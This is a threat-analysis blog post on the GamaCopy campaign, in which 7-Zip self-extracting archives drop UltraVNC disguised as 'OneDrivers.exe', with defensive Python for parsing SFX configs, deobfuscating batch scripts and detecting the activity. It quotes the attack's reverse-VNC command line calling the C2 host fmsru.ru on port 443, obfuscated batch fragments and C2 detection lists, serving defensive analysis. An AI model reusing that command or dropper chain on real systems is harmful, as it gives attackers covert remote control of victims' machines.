Protect Against New Malware Using 7z & UltraVNC Tool

GamaCopy Malware Campaign

Security researchers have uncovered a malware campaign that targets Russian-speaking organizations with 7-Zip self-extracting (SFX) archives and the UltraVNC remote access tool. The campaign is attributed to a threat actor tracked as GamaCopy, whose tradecraft mimics that of the Kremlin-aligned Gamaredon group; the targeting is narrow and deliberate rather than opportunistic.

In this blog, we’ll delve into the attack chain, analyze the infrastructure the threat actors use, and discuss protective measures organizations can take to mitigate this threat.

Understanding the Attack Chain

The GamaCopy campaign begins with a spear-phishing email aimed at specific individuals or organizations. The email carries a malicious self-extracting (SFX) archive built with 7-Zip. An SFX archive is an ordinary Windows executable: a benign 7-Zip extractor stub with the compressed payload and a small plain-text configuration block appended, where the configuration tells the stub what to run after extraction. The stub itself is clean and widely distributed, so the attachment passes superficial checks, and no vulnerability has to be exploited; the chain depends only on the recipient running the file, after which the stub drops and launches the malware's core components.

How the Attack Works

Once the victim executes the SFX archive, it unpacks a batch script that performs several critical actions:

  1. Decoy Deployment: A PDF document with military-related content is copied to the victim's system to give the user something plausible to look at while the rest of the script runs.
  2. Installation of UltraVNC: The script installs a legitimate copy of the UltraVNC server but renames it "OneDrivers.exe" so that a casual look at the process list mistakes it for Microsoft OneDrive.
  3. Command and Control Configuration: UltraVNC is started in reverse-connection mode, so the victim's machine makes an outbound connection on port 443 to the attacker's listener (an UltraVNC viewer or repeater) rather than waiting for an inbound connection. Because the session originates inside the network on a port that firewalls allow for HTTPS, it passes through perimeter controls and gives the operators interactive desktop access.

Taken together, these steps give the attackers interactive access to the system while the running process and its network connection look, at first glance, like ordinary cloud-sync activity.
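Because the SFX configuration travels inside the executable as a plain-text block, an analyst can read what the stub will run without executing the sample. The following Python is an added example, not code from the original post or from the researchers who reported the campaign. It locates the ;!@Install@!UTF-8! ... ;!@InstallEnd@! block that the 7-Zip installer SFX module reads, parses its directives, finds the offset of the appended 7z archive by its signature, and flags the settings a dropper typically relies on. The sample bytes, including the file name install.bat, are constructed for the demonstration.

```python
import re

SFX_CFG_START = b";!@Install@!UTF-8!"
SFX_CFG_END = b";!@InstallEnd@!"
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"   # six-byte signature that opens every 7z archive

# Constructed stand-in for an SFX executable: a placeholder for the 7-Zip
# extractor stub, the configuration block a builder writes, then the appended
# archive. Nothing here is taken from the real sample; install.bat is made up.
SAMPLE_CONFIG = (
    b";!@Install@!UTF-8!\r\n"
    b'Title="Document"\r\n'
    b'Progress="no"\r\n'
    b'RunProgram="hidcon:install.bat"\r\n'
    b";!@InstallEnd@!\r\n"
)
SAMPLE_SFX = (
    b"MZ" + b"\x00" * 62 + b"[7-Zip SFX stub placeholder]" + b"\x00" * 16
    + SAMPLE_CONFIG
    + SEVENZ_MAGIC + b"\x00\x04" + b"\x00" * 32
)

# One directive per line in the form Key="value"
DIRECTIVE_RE = re.compile(r'^\s*(\w+)="([^"\r\n]*)"', re.MULTILINE)


def extract_sfx_config(blob: bytes) -> dict:
    """Return the Key="value" directives of the SFX config block, or {} if absent."""
    start = blob.find(SFX_CFG_START)
    if start < 0:
        return {}
    end = blob.find(SFX_CFG_END, start)
    if end < 0:
        return {}
    body = blob[start + len(SFX_CFG_START):end].decode("utf-8", "replace")
    return dict(DIRECTIVE_RE.findall(body))


def locate_archive(blob: bytes) -> int:
    """Offset of the appended 7z archive, or -1 if the signature is missing."""
    return blob.find(SEVENZ_MAGIC)


def triage(blob: bytes) -> dict:
    """Summarize what the stub would do after extraction, from the config alone."""
    cfg = extract_sfx_config(blob)
    run = cfg.get("RunProgram", "")
    exe = cfg.get("ExecuteFile", "")
    findings = []
    if run.lower().startswith("hidcon:"):
        findings.append("RunProgram hides its console window (hidcon: prefix)")
    if any(t.lower().endswith((".bat", ".cmd")) for t in (run, exe) if t):
        findings.append("stub launches a batch script after extraction")
    if cfg.get("Progress", "").lower() == "no":
        findings.append("extraction progress window suppressed")
    return {"config": cfg, "archive_offset": locate_archive(blob), "findings": findings}


if __name__ == "__main__":
    result = triage(SAMPLE_SFX)
    for key, value in result["config"].items():
        print(f"{key} = {value}")
    print("archive at offset", result["archive_offset"])
    for finding in result["findings"]:
        print("!", finding)
```

Samples built with the plain 7z.sfx extractor (as opposed to the installer module) carry no configuration block; extract_sfx_config then returns an empty dictionary, and the archive offset still tells you where to carve the 7z payload for extraction with a stand-alone 7-Zip.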

Infrastructure Analysis

The batch script used in the campaign relies on simple obfuscation, randomized variable names and strings split into fragments, to hide its intent and slow down analysis. Below is an excerpt of the script:

@echo off
setlocal enabledelayedexpansion
rem The randomized names hide the real values: the host name, a numeric
rem suffix for the session ID, and the string "UltraVNC" split in two
rem so that the tool's name never appears whole in the file.
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC

Key Functions of the Script

  • Renaming and Execution: The script copies UltraVNC to the victim's system, renames it "OneDrivers.exe," and starts it with parameters that turn it into a reverse-connecting VNC server. -connect host:port makes the server dial out to the given listener instead of waiting for a viewer, -id: sets the identifier used when the listener is an UltraVNC repeater, and -autoreconnect re-establishes the session whenever it drops:
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443  
  • Command and Control (C2) Servers: The malware connects on port 443 to the following hosts, which receive the reverse VNC sessions and give the attackers remote control:
    • nefteparkstroy.ru:443
    • fmsru.ru:443
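To see how the fragments above recombine into that command, here is an added Python example (not part of the original post or of the researchers' tooling) that statically resolves a batch script: it collects every set assignment and expands %NAME% and !NAME! references until nothing changes, leaving runtime environment variables such as %COMPUTERNAME% in place unless the analyst supplies values for them. The four set lines are the ones quoted above; the copy and start lines are constructed to show the recombination and are not taken from the real sample.

```python
import re

# Sample obfuscated script. The four "set" lines are the fragment quoted
# above; the copy and start lines are constructed for this example to show
# how the fragments are recombined and are not taken from the real sample.
SAMPLE_SCRIPT = r'''
@echo off
setlocal enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
copy "%rM91V31H31q51V41E3%%NX96b26L46A16Y66r6%.exe" "%TEMP%\OneDrivers.exe"
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:!qH09C99079b99D4900!_SVOD_!db53P23A03h83Z23e6! -connect fmsru.ru:443
'''

# set NAME=value  or  set "NAME=value"  (cmd treats names case-insensitively)
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=([^"]*)"?\s*$', re.IGNORECASE)
# %NAME% (immediate) or !NAME! (delayed expansion) references
REF_RE = re.compile(r'%(\w+)%|!(\w+)!')
SKIP_PREFIXES = ("@echo", "echo off", "setlocal", "endlocal", "rem ", "::")


def parse_sets(script: str) -> dict:
    """Collect every variable assigned with set, keyed by upper-cased name."""
    assigned = {}
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            assigned[m.group(1).upper()] = m.group(2)
    return assigned


def expand(text: str, assigned: dict, env=None, max_rounds: int = 20) -> str:
    """Replace references with script-assigned values (then any supplied
    environment values). Iterates because a value may itself contain
    references; stops at a fixed point or after max_rounds so that a
    self-referencing definition cannot loop forever. Unknown names are
    left as written so the analyst sees which runtime values the script
    depends on."""
    lookup = {k.upper(): v for k, v in (env or {}).items()}
    lookup.update(assigned)

    def sub(m):
        name = (m.group(1) or m.group(2)).upper()
        return lookup.get(name, m.group(0))

    for _ in range(max_rounds):
        new = REF_RE.sub(sub, text)
        if new == text:
            break
        text = new
    return text


def resolve_script(script: str, env=None) -> list:
    """Return the command lines (assignments and housekeeping removed) with
    every reference expanded. Static resolution assumes a straight-line
    script with no loops or later reassignment of the same name, which
    holds for this dropper."""
    assigned = parse_sets(script)
    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or SET_RE.match(line) or line.lower().startswith(SKIP_PREFIXES):
            continue
        commands.append(expand(line, assigned, env))
    return commands


if __name__ == "__main__":
    for cmd in resolve_script(SAMPLE_SCRIPT):
        print(cmd)
```

Passing env={"COMPUTERNAME": ..., "TEMP": ...} reproduces the exact command line a given host would have executed, which is what you want when matching against EDR telemetry; without it the output is the generic form shown above.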

Similarities with Gamaredon Tactics

The tactics employed by GamaCopy (which researchers link to the cluster also tracked as Core Werewolf, Awaken Likho, and PseudoGamaredon) closely resemble those of the Gamaredon group. These similarities include:

  1. Use of 7-Zip SFX Archives: GamaCopy relies on self-extracting archives for payload delivery, a tactic commonly observed in Gamaredon’s campaigns.
  2. Deployment of UltraVNC: The use of UltraVNC as a remote access tool mirrors previous Gamaredon operations.
  3. Port 443 for C2 Communication: Both groups use port 443, the standard HTTPS port, for their C2 connections so that the traffic blends in with web browsing. The traffic is VNC rather than HTTPS, though: unless UltraVNC's optional encryption plugin is in use, the session opens with the cleartext RFB version handshake, which a protocol-aware sensor can recognize on port 443 even though the port suggests TLS.
  4. Obfuscated Batch Scripts: The heavy reliance on batch script obfuscation is a hallmark of Gamaredon-inspired attacks.

These overlapping tactics suggest that GamaCopy has either drawn inspiration from Gamaredon or is a direct offshoot of the group. The victimology argues for caution, however: Gamaredon targets Ukrainian entities, whereas this campaign targets Russian-speaking organizations, so shared tooling and delivery methods alone are weak evidence of a shared operator.

Implications for Targeted Organizations

The GamaCopy campaign poses a significant threat to Russian-speaking organizations, particularly those in the defense, government, and critical infrastructure sectors. Using military-themed decoy documents indicates a focus on espionage and data exfiltration, aiming to gather sensitive information that could be used for strategic purposes.

Additionally, because the remote access component is an unmodified, legitimate tool rather than custom malware, signature-based detection has little to key on; defenders have to rely on context, such as where the binary lives, what it was renamed to, how it was launched, and where it connects.

Mitigation Strategies

Organizations should adopt a multi-layered cybersecurity approach to protect against the GamaCopy malware campaign and similar threats. Below are some key measures to consider:

1. Strengthen Email Security

  • Deploy email filtering that detects and quarantines suspicious attachments. SFX archives are executables (PE files) with a 7z archive appended, so block executable attachments outright, including those nested inside containers, and inspect attachments for the 7z signature rather than trusting the file extension.
  • Implement advanced threat detection systems capable of identifying spear-phishing attempts.

2. Employee Awareness and Training

  • Educate employees on recognizing phishing emails, especially those with military or sensitive themes.
  • Conduct regular cybersecurity training sessions to ensure staff remain vigilant against social engineering tactics.

3. Application Allowlisting

  • Implement application allowlisting to restrict the execution of unauthorized or unknown software.
  • Inventory where remote access tools such as UltraVNC are legitimately installed, and alert when their binaries (identifiable by version-resource fields such as the original file name, whatever the name on disk) run from user-writable locations such as %TEMP%.

4. Network Monitoring

  • Monitor network traffic for unexpected connections, particularly outbound sessions from endpoints to unfamiliar domains and VNC or other remote-access protocols on ports where HTTPS is expected; an RFB handshake on port 443 is a strong signal.
  • Deploy intrusion detection systems (IDS) to identify and block malicious activity in real time, and add the campaign's C2 domains (nefteparkstroy.ru, fmsru.ru) to block lists and to retrospective log searches.
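As an added example of the allowlisting and network-monitoring points (not code from the original post or from the researchers), the Python below runs a small rule set over constructed Sysmon-style process-creation and network-connection events: a binary whose version-resource original file name does not match its name on disk, a command line carrying UltraVNC's reverse-connection switches, an executable started from a Temp directory by cmd.exe, a connection to the campaign's reported C2 domains, and any Temp-resident binary talking on port 443. The events, the host name WS-01, and the assumption that UltraVNC's server carries the original file name winvnc.exe and product name UltraVNC are constructed for this example.

```python
import ntpath

KNOWN_C2 = {"nefteparkstroy.ru", "fmsru.ru"}          # domains reported for the campaign
VNC_REVERSE_FLAGS = ("-connect", "-id:", "-autoreconnect")
TEMP_MARKERS = ("\\temp\\",)                          # user-writable staging locations

# Constructed Sysmon-style events, not real telemetry. Field names follow
# Sysmon Event ID 1 (process create) and Event ID 3 (network connect).
# The version-resource strings assumed for UltraVNC's server (original file
# name winvnc.exe, product UltraVNC) and the host WS-01 are assumptions.
EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Users\ivan\AppData\Local\Temp\OneDrivers.exe",
     "OriginalFileName": "winvnc.exe", "Product": "UltraVNC",
     "CommandLine": r"C:\Users\ivan\AppData\Local\Temp\OneDrivers.exe "
                    r"-autoreconnect -id:WS-01_SVOD_4797 -connect fmsru.ru:443",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3,
     "Image": r"C:\Users\ivan\AppData\Local\Temp\OneDrivers.exe",
     "DestinationHostname": "fmsru.ru", "DestinationPort": 443},
    {"EventID": 1,
     "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "OriginalFileName": "OneDrive.exe", "Product": "Microsoft OneDrive",
     "CommandLine": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3,
     "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "DestinationHostname": "updates.example.com", "DestinationPort": 443},
    {"EventID": 1,
     "Image": r"C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe",
     "OriginalFileName": "winvnc.exe", "Product": "UltraVNC",
     "CommandLine": r'"C:\Program Files\uvnc bvba\UltraVNC\winvnc.exe" -service',
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process(ev: dict) -> list:
    """Rules for a process-creation event; returns (rule, detail) pairs."""
    hits = []
    image = ev["Image"].lower()
    cmd = ev.get("CommandLine", "").lower()
    orig = ev.get("OriginalFileName", "").lower()
    # The version resource survives a rename on disk, so it exposes the RAT.
    if orig and orig != _name(image):
        hits.append(("renamed-binary",
                     f"{_name(image)} carries OriginalFileName {orig} ({ev.get('Product')})"))
    # Two or more of UltraVNC's reverse-connection switches on one command line.
    if sum(flag in cmd for flag in VNC_REVERSE_FLAGS) >= 2:
        hits.append(("vnc-reverse-connect", ev.get("CommandLine", "")))
    # An executable in a Temp directory launched by cmd.exe is what an SFX
    # stub running its embedded batch script looks like.
    if any(m in image for m in TEMP_MARKERS) and _name(ev.get("ParentImage", "")) == "cmd.exe":
        hits.append(("temp-exec-from-batch", ev["Image"]))
    return hits


def check_network(ev: dict) -> list:
    """Rules for a network-connection event; returns (rule, detail) pairs."""
    hits = []
    image = ev["Image"].lower()
    host = ev.get("DestinationHostname", "").lower()
    if host in KNOWN_C2:
        hits.append(("known-c2", host))
    # Port 443 from a Temp-resident binary: the port says HTTPS, the path does not.
    if ev.get("DestinationPort") == 443 and any(m in image for m in TEMP_MARKERS):
        hits.append(("temp-binary-443", f"{_name(image)} -> {host}:443"))
    return hits


def scan(events: list) -> list:
    """Dispatch each event to its rule set and collect alerts."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            hits = check_process(ev)
        elif ev["EventID"] == 3:
            hits = check_network(ev)
        else:
            hits = []
        for rule, detail in hits:
            alerts.append({"rule": rule, "image": ev["Image"], "detail": detail})
    return alerts


if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(f"[{alert['rule']}] {alert['image']}: {alert['detail']}")
```

The original-file-name mismatch on its own produces false positives (installers and legitimately renamed copies do the same), so weight it together with the other rules rather than alerting on it alone; the RFB-on-443 check belongs in the network sensor, since endpoint connection events do not carry protocol payload.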

5. Patch Management

  • Regularly update and patch systems to address known vulnerabilities that threat actors could exploit.
  • Keep third-party tools such as 7-Zip up to date as general hygiene, while recognizing that this campaign exploits no 7-Zip vulnerability: the SFX stub works exactly as designed, and patching does not stop a user from running the attachment. Email controls and application allowlisting are the defenses that actually break this chain.

6. Incident Response Planning

  • Develop and regularly test an incident response plan to quickly identify, contain, and mitigate security incidents.
  • Establish communication protocols for reporting and addressing potential threats.

Conclusion

The GamaCopy malware campaign underscores the evolving nature of cyber threats and the importance of proactive defense measures. By leveraging spear-phishing emails, obfuscated scripts, and legitimate remote access tools, the threat actors behind GamaCopy have demonstrated their ability to bypass traditional security measures and target high-value organizations.

Organizations, particularly those in sensitive sectors, must remain vigilant and adopt comprehensive cybersecurity practices to mitigate the risks of advanced threat campaigns. By combining robust technology with employee awareness, businesses can strengthen their defenses and minimize the impact of sophisticated attacks like GamaCopy.

For more:

https://cybersecuritynews.com/new-malware-campaign-using-7z-ultravnc-tool/

Hoplon Infosec
